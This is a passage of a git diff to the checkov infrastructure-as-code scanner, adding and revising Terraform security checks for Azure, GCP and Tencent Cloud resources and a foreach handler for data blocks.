         return CheckResult.FAILED
 
diff --git a/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py b/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py
index c624fb2aef6..eac3216bcf5 100644
--- a/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py
+++ b/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py
@@ -2,11 +2,11 @@
 
 from typing import Any
 
-from checkov.common.models.enums import CheckCategories, CheckResult
-from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
 
 
-class StorageAccountDisablePublicAccess(BaseResourceNegativeValueCheck):
+class StorageAccountDisablePublicAccess(BaseResourceValueCheck):
     def __init__(self) -> None:
         name = "Ensure that Storage accounts disallow public access"
         id = "CKV_AZURE_59"
@@ -17,14 +17,13 @@ def __init__(self) -> None:
             id=id,
             categories=categories,
             supported_resources=supported_resources,
-            missing_attribute_result=CheckResult.FAILED,
         )
 
     def get_inspected_key(self) -> str:
         return "public_network_access_enabled"
 
-    def get_forbidden_values(self) -> list[Any]:
-        return [True]
+    def get_expected_values(self) -> list[Any]:
+        return [False]
 
 
 check = StorageAccountDisablePublicAccess()
diff --git a/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py b/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py
index d65fb174416..b50eb9cb5c4 100644
--- a/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py
+++ b/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py
@@ -2,11 +2,11 @@
 
 from typing import Any
 
-from checkov.common.models.enums import CheckCategories, CheckResult
-from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
 
 
-class StorageBlobRestrictPublicAccess(BaseResourceNegativeValueCheck):
+class StorageBlobRestrictPublicAccess(BaseResourceValueCheck):
     def __init__(self) -> None:
         name = "Ensure that Storage blobs restrict public access"
         id = "CKV_AZURE_190"
@@ -17,14 +17,13 @@ def __init__(self) -> None:
             id=id,
             categories=categories,
             supported_resources=supported_resources,
-            missing_attribute_result=CheckResult.FAILED,
         )
 
     def get_inspected_key(self) -> str:
         return "allow_nested_items_to_be_public"
 
-    def get_forbidden_values(self) -> list[Any]:
-        return [True]
+    def get_expected_values(self) -> list[Any]:
+        return [False]
 
 
 check = StorageBlobRestrictPublicAccess()
diff --git a/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py b/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py
new file mode 100644
index 00000000000..75dc5d096eb
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py
@@ -0,0 +1,19 @@
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
+
+
+class SynapseSQLPoolDataEncryption(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Synapse SQL pools are encrypted"
+        id = "CKV_AZURE_241"
+        supported_resources = ['azurerm_synapse_sql_pool']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf):
+        if 'data_encrypted' in conf and conf['data_encrypted'][0] is True:
+            return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = SynapseSQLPoolDataEncryption()
diff --git a/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py b/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py
new file mode 100644
index 00000000000..7eec03bc0bd
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py
@@ -0,0 +1,19 @@
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
+
+
+class SynapseWorkspaceAdministratorLoginPasswordHidden(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Azure Synapse Workspace administrator login password is not exposed"
+        id = "CKV_AZURE_239"
+        supported_resources = ['azurerm_synapse_workspace']
+        categories = [CheckCategories.SECRETS]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf):
+        if 'sql_administrator_login_password' in conf:
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = SynapseWorkspaceAdministratorLoginPasswordHidden()
diff --git a/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py b/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py
new file mode 100644
index 00000000000..3de1bddc4a6
--- /dev/null
+++ b/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py
@@ -0,0 +1,21 @@
+from checkov.common.models.consts import ANY_VALUE
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class SynapseWorkspaceCMKEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Azure Synapse Workspace is encrypted with a CMK"
+        id = "CKV_AZURE_240"
+        supported_resources = ['azurerm_synapse_workspace']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "customer_managed_key/[0]/key_name"
+
+    def get_expected_value(self):
+        return ANY_VALUE
+
+
+check = SynapseWorkspaceCMKEncryption()
diff --git a/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py b/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py
index 0eb47728b0a..0a1f0895545 100644
--- a/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py
+++ b/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py
@@ -25,14 +25,19 @@ def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
             match = rule.get("match")
             if match and isinstance(match, list):
                 expr = match[0].get("expr")
-                if expr and isinstance(expr[0], dict) and expr[0].get("expression") == ["evaluatePreconfiguredExpr('cve-canary')"]:
-                    if rule.get("action") == ["allow"]:
-                        return CheckResult.FAILED
-                    if rule.get("preview") == [True]:
-                        return CheckResult.FAILED
-
-                    return CheckResult.PASSED
-
+                if expr and isinstance(expr[0], dict):
+                    if expr[0].get("expression") == ["evaluatePreconfiguredExpr('cve-canary')"]:
+                        if rule.get("action") == ["allow"]:
+                            return CheckResult.FAILED
+                        if rule.get("preview") == [True]:
+                            return CheckResult.FAILED
+                        return CheckResult.PASSED
+                    elif expr[0].get("expression") == ["evaluatePreconfiguredWaf('cve-canary')"]:
+                        if rule.get("action") == ["allow"]:
+                            return CheckResult.FAILED
+                        if rule.get("preview") == [True]:
+                            return CheckResult.FAILED
+                        return CheckResult.PASSED
         return CheckResult.FAILED
 
 
diff --git a/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py b/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py
new file mode 100644
index 00000000000..7e4fd15bff5
--- /dev/null
+++ b/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py
@@ -0,0 +1,25 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CloudFunctionPermissiveIngress(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure GCP Cloud Function is not configured with overly permissive Ingress setting"
+        id = "CKV_GCP_124"
+        supported_resources = ("google_cloudfunctions_function", "google_cloudfunctions2_function")
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        if self.entity_type == "google_cloudfunctions_function":
+            return "ingress_settings"
+        else:
+            return "service_config/[0]/ingress_settings/[0]"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["ALLOW_INTERNAL_AND_GCLB", "ALLOW_INTERNAL_ONLY"]
+
+
+check = CloudFunctionPermissiveIngress()
diff --git a/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py b/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py
deleted file mode 100644
index d14200351dc..00000000000
--- a/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py
+++ /dev/null
@@ -1,37 +0,0 @@
-from __future__ import annotations
-
-from typing import Any
-
-from checkov.common.models.enums import CheckResult, CheckCategories
-from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
-
-
-class GKEBasicAuth(BaseResourceCheck):
-    def __init__(self) -> None:
-        name = "Ensure GKE basic auth is disabled"
-        id = "CKV_GCP_19"
-        supported_resources = ('google_container_cluster',)
-        categories = (CheckCategories.KUBERNETES,)
-        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
-
-    def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult:
-        # since GKE 1.19 the usage of basic auth is deprecated and in the provider version 4+ removed
-        master_auth = conf.get("master_auth")
-        if master_auth and isinstance(master_auth, list):
-            username = master_auth[0].get('username')
-            password = master_auth[0].get('password')
-            if username or password:
-                # only if both are set to the empty string it is fine
-                # https://registry.terraform.io/providers/hashicorp/google/3.90.1/docs/resources/container_cluster.html
-                if username and password:
-                    if username[0] == '' and password[0] == '':
-                        return CheckResult.PASSED
-                return CheckResult.FAILED
-
-        return CheckResult.PASSED
-
-    def get_evaluated_keys(self) -> list[str]:
-        return ['master_auth/[0]/username', 'master_auth/[0]/password']
-
-
-check = GKEBasicAuth()
diff --git a/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py b/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py
index 1b69dc80862..3ed265a138c 100644
--- a/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py
+++ b/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py
@@ -18,7 +18,7 @@ def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
             return CheckResult.UNKNOWN
 
         stack = conf.get("stack_type")
-        if stack and isinstance(stack, list) and stack[0] != "IPV4_IPV6":
+        if not stack or (stack and isinstance(stack, list) and stack[0] != "IPV4_IPV6"):
             return CheckResult.UNKNOWN
 
         return super().scan_resource_conf(conf)
diff --git a/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py b/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py
new file mode 100644
index 00000000000..9630077082f
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceValueCheck
+
+
+class CBSEncryption(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CBS is encrypted"
+        id = "CKV_TC_1"
+        supported_resources = ['tencentcloud_cbs_storage']
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return 'encrypt'
+
+    def get_expected_value(self) -> List[Any]:
+        return True
+
+
+check = CBSEncryption()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py b/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py
new file mode 100644
index 00000000000..93f5b43922a
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_negative_value_check import \
+    BaseResourceNegativeValueCheck
+
+
+class CDBInternetService(BaseResourceNegativeValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud mysql instances do not enable access from public networks"
+        id = "CKV_TC_9"
+        supported_resources = ['tencentcloud_mysql_instance']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'internet_service/[0]'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return [1]
+
+
+check = CDBInternetService()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py b/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py
new file mode 100644
index 00000000000..91f33644100
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_negative_value_check import \
+    BaseResourceNegativeValueCheck
+
+
+class CDBIntranetPort(BaseResourceNegativeValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud MySQL instances intranet ports are not set to the default 3306"
+        id = "CKV_TC_10"
+        supported_resources = ['tencentcloud_mysql_instance']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'intranet_port/[0]'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return [3306]
+
+
+check = CDBIntranetPort()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py b/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py
new file mode 100644
index 00000000000..182d63501be
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py
@@ -0,0 +1,20 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceCheck
+
+
+class CLBInstanceLog(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CLB has a logging ID and topic"
+        id = "CKV_TC_11"
+        supported_resources = ['tencentcloud_clb_instance']
+        categories = [CheckCategories.LOGGING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf) -> CheckResult:
+        if conf.get("log_set_id") is None or conf.get("log_topic_id") is None:
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = CLBInstanceLog()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py b/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py
new file mode 100644
index 00000000000..41d35613e3a
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_negative_value_check import \
+    BaseResourceNegativeValueCheck
+
+
+class CLBListenerProtocol(BaseResourceNegativeValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CLBs use modern, encrypted protocols"
+        id = "CKV_TC_12"
+        supported_resources = ['tencentcloud_clb_listener']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'protocol/[0]'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return ["TCP", "UDP", "HTTP"]
+
+
+check = CLBListenerProtocol()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py b/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py
new file mode 100644
index 00000000000..58a5e8afe7a
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_negative_value_check import \
+    BaseResourceNegativeValueCheck
+
+
+class CVMAllocatePublicIp(BaseResourceNegativeValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CVM instance does not allocate a public IP"
+        id = "CKV_TC_2"
+        supported_resources = ['tencentcloud_instance']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'allocate_public_ip/[0]'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return [True]
+
+
+check = CVMAllocatePublicIp()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py b/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py
new file mode 100644
index 00000000000..e39728ad46f
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_negative_value_check import \
+    BaseResourceNegativeValueCheck
+
+
+class CVMDisableMonitorService(BaseResourceNegativeValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CVM monitor service is enabled"
+        id = "CKV_TC_3"
+        supported_resources = ['tencentcloud_instance']
+        categories = [CheckCategories.LOGGING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'disable_monitor_service/[0]'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return [True]
+
+
+check = CVMDisableMonitorService()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py
new file mode 100644
index 00000000000..54bc61f6dc2
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py
@@ -0,0 +1,27 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceCheck
+
+
+class CVMUseDefaultSecurityGroup(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CVM instances do not use the default security group "
+        id = "CKV_TC_4"
+        supported_resources = ['tencentcloud_instance']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict) -> CheckResult:
+        if conf.get("orderly_security_groups"):
+            for osg in conf["orderly_security_groups"][0]:
+                if ".default." in osg:
+                    return CheckResult.FAILED
+
+        if conf.get("security_groups"):
+            for sg in conf["security_groups"][0]:
+                if ".default." in sg:
+                    return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = CVMUseDefaultSecurityGroup()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py
new file mode 100644
index 00000000000..b3e3c94375a
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py
@@ -0,0 +1,22 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceCheck
+
+
+class CVMUseDefaultVPC(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CVM instances do not use the default VPC"
+        id = "CKV_TC_5"
+        supported_resources = ['tencentcloud_instance']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf) -> CheckResult:
+        if conf.get("vpc_id") and ".default." in conf["vpc_id"][0]:
+            return CheckResult.FAILED
+        if conf.get("subnet_id") and ".default." in conf["subnet_id"][0]:
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = CVMUseDefaultVPC()
diff --git a/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py b/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py
new file mode 100644
index 00000000000..d75be4576c9
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py
@@ -0,0 +1,22 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import (
+    BaseResourceCheck, CheckResult)
+
+
+class CVMUserData(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud CVM user data does not contain sensitive information"
+        id = "CKV_TC_13"
+        supported_resources = ['tencentcloud_instance']
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict) -> CheckResult:
+        if conf.get("user_data_raw") and ("TENCENTCLOUD_SECRET_ID" in conf["user_data_raw"][0] or "TENCENTCLOUD_SECRET_KEY" in conf["user_data_raw"][0]):
+            return CheckResult.FAILED
+        if conf.get("user_data") and ("TENCENTCLOUD_SECRET_ID" in conf["user_data"][0] or "TENCENTCLOUD_SECRET_KEY" in conf["user_data"][0]):
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = CVMUserData()
diff --git a/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py b/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py
new file mode 100644
index 00000000000..09e197d8ed7
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py
@@ -0,0 +1,21 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceValueCheck
+
+
+class TKELogAgentEnable(BaseResourceValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud TKE clusters enable log agent"
+        id = "CKV_TC_6"
+        supported_resources = ['tencentcloud_kubernetes_cluster']
+        categories = [CheckCategories.LOGGING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self):
+        return "log_agent/enabled"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = TKELogAgentEnable()
diff --git a/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py b/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py
new file mode 100644
index 00000000000..870f8931f47
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py
@@ -0,0 +1,31 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceCheck
+
+
+class TKEPublicIpAssigned(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud TKE cluster is not assigned a public IP address"
+        id = "CKV_TC_7"
+        supported_resources = ['tencentcloud_kubernetes_cluster']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf) -> CheckResult:
+        if conf.get("master_config"):
+            for mc in conf["master_config"]:
+                if mc.get("public_ip_assigned") and mc["public_ip_assigned"][0]:
+                    return CheckResult.FAILED
+                if mc.get("public_ip_assigned") is None and mc.get("internet_max_bandwidth_out") and mc["internet_max_bandwidth_out"][0] > 0:
+                    return CheckResult.FAILED
+
+        if conf.get("worker_config"):
+            for mc in conf["worker_config"]:
+                if mc.get("public_ip_assigned") and mc["public_ip_assigned"][0]:
+                    return CheckResult.FAILED
+                if mc.get("public_ip_assigned") is None and mc.get("internet_max_bandwidth_out") and mc["internet_max_bandwidth_out"][0] > 0:
+                    return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = TKEPublicIpAssigned()
diff --git a/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py b/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py
new file mode 100644
index 00000000000..6c81952e435
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py
@@ -0,0 +1,23 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_negative_value_check import \
+    BaseResourceNegativeValueCheck
+
+
+class VPCFlowLogConfigEnable(BaseResourceNegativeValueCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud VPC flow logs are enabled"
+        id = "CKV_TC_14"
+        supported_resources = ['tencentcloud_vpc_flow_log_config']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'enable/[0]'
+
+    def get_forbidden_values(self) -> List[Any]:
+        return [False]
+
+
+check = VPCFlowLogConfigEnable()
diff --git a/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py b/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py
new file mode 100644
index 00000000000..39340dd7b26
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py
@@ -0,0 +1,30 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.terraform.checks.resource.base_resource_value_check import \
+    BaseResourceCheck
+
+
+class VPCSecurityGroupRuleSet(BaseResourceCheck):
+    def __init__(self):
+        name = "Ensure Tencent Cloud VPC security group rules do not accept all traffic"
+        id = "CKV_TC_8"
+        supported_resources = ['tencentcloud_security_group_rule_set']
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf) -> CheckResult:
+        if conf.get("ingress"):
+            for i in conf["ingress"]:
+                if i.get("action") and i["action"][0] != "ACCEPT":
+                    continue
+                if i.get("cidr_block") is None and i.get("ipv6_cidr_block") is None:
+                    continue
+                if i.get("cidr_block") and i["cidr_block"][0] != "0.0.0.0/0":
+                    continue
+                if i.get("ipv6_cidr_block") and (i["ipv6_cidr_block"][0] not in ["::/0", "0::0/0"]):
+                    continue
+                return CheckResult.FAILED
+
+        return CheckResult.PASSED
+
+
+check = VPCSecurityGroupRuleSet()
diff --git a/checkov/terraform/checks/resource/tencentcloud/__init__.py b/checkov/terraform/checks/resource/tencentcloud/__init__.py
new file mode 100644
index 00000000000..459e8fd319b
--- /dev/null
+++ b/checkov/terraform/checks/resource/tencentcloud/__init__.py
@@ -0,0 +1,5 @@
+import glob
+from os.path import basename, dirname, isfile, join
+
+modules = glob.glob(join(dirname(__file__), "*.py"))
+__all__ = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith("__init__.py")]
diff --git a/checkov/terraform/graph_builder/foreach/builder.py b/checkov/terraform/graph_builder/foreach/builder.py
index f19d0b009d5..ffaf7bca36d 100644
--- a/checkov/terraform/graph_builder/foreach/builder.py
+++ b/checkov/terraform/graph_builder/foreach/builder.py
@@ -2,6 +2,7 @@
 
 import typing
 
+from checkov.terraform.graph_builder.foreach.data_handler import ForeachDataHandler
 from checkov.terraform.graph_builder.foreach.module_handler import ForeachModuleHandler
 from checkov.terraform.graph_builder.foreach.resource_handler import ForeachResourceHandler
 from checkov.terraform.graph_builder.graph_components.block_types import BlockType
@@ -14,12 +15,21 @@ class ForeachBuilder:
     def __init__(self, local_graph: TerraformLocalGraph):
         self._resource_handler = ForeachResourceHandler(local_graph)
         self._module_handler = ForeachModuleHandler(local_graph)
+        self._data_handler = ForeachDataHandler(local_graph)
 
     def handle(self, foreach_blocks: dict[str, list[int]]) -> None:
+        """
+        First Data blocks that Modules can inherit from are handled.
+        Second, Module blocks are handled.
+        Last Resource blocks that can be duplicate by the Modules rendering.
+        """
+        if self._data_handler.local_graph.enable_datas_foreach_handling:
+            if foreach_blocks.get(BlockType.DATA):
+                self._data_handler.handle(foreach_blocks[BlockType.DATA])
+                self._data_handler.local_graph._arrange_graph_data()
+                self._data_handler.local_graph._build_edges()
         if self._module_handler.local_graph.enable_modules_foreach_handling:
             if foreach_blocks.get(BlockType.MODULE):
                 self._module_handler.handle(foreach_blocks[BlockType.MODULE])
-                self._module_handler.local_graph._arrange_graph_data()
-                self._module_handler.local_graph._build_edges()
         if self._module_handler.local_graph.enable_foreach_handling:
             self._resource_handler.handle(foreach_blocks.get(BlockType.RESOURCE, []))
diff --git a/checkov/terraform/graph_builder/foreach/data_handler.py b/checkov/terraform/graph_builder/foreach/data_handler.py
new file mode 100644
index 00000000000..f5a343471b2
--- /dev/null
+++ b/checkov/terraform/graph_builder/foreach/data_handler.py
@@ -0,0 +1,14 @@
+from __future__ import annotations
+
+from checkov.terraform.graph_builder.graph_components.block_types import BlockType
+from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
+
+
+class ForeachDataHandler(ForeachEntityHandler):
+    def __init__(self, local_graph: TerraformLocalGraph) -> None:
+        super().__init__(local_graph, BlockType.DATA)
diff --git a/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py
new file mode 100644
index 00000000000..7fc4dc771df
--- /dev/null
+++ b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py
@@ -0,0 +1,108 @@
+from __future__ import annotations
+
+import logging
+from typing import Any, Optional, TYPE_CHECKING
+
+from checkov.common.util.data_structures_utils import pickle_deepcopy
+from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler
+from checkov.terraform.graph_builder.foreach.consts import FOR_EACH_BLOCK_TYPE, FOREACH_STRING, COUNT_STRING
+from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock
+
+if TYPE_CHECKING:
+    from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
+
+
